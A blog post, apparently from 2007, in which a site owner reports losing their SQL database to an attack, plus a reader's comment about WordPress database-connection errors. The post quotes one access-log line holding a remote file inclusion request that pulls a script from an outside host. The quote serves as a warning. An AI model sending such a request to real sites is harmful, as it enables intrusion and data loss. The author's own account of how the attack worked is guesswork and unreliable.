If you're SQL database isn't backing up or is acting weird..

    You may have been hacked,

they nailed me today... I lost everything.

    :-(

    Here's the offending hack:

    4.66.112.173 - - [17/Dec/2007:04:00:44 -0800] "GET /?q=node/2//?q=nodehttp://gw-gold.net/xpl/id.txt

it was a targeted attack. But still the same, if they're doing this, everyone is going to get it eventually. I was injected on the 17'th and today it executed and took out my SQL Database.

I was able to recover older stuff from my Blogger Blog, but I lost widgets, Entries, everything.

    so, there you go...

I'm so bummed, I'm seriously thinking about hanging it up with Blogging...

    Hi Chuck,

I got up this morning, and I went to check my e-mail, and someone let me know they could not get to a WP post I sent them. I put the article link into IE, hit enter, and I keep getting all the following:

    Error establishing a database connection
This either means that the username and password information in your wp-config.php file is incorrect or we can't contact the database server at localhost. This could mean your host's database server is down.

Are you sure you have the correct username and password?
Are you sure that you have typed the correct hostname?
Are you sure that the database server is running?

I've check all php, and it is solid.

Could this be your infamous hacker,or am I just out of luck?

Nothing I have related to both of my WordPress installations are working as of this morning. I haven't changed a thing.

Sure would like some help or advice.

    Sincerely,
    [sig moderated]
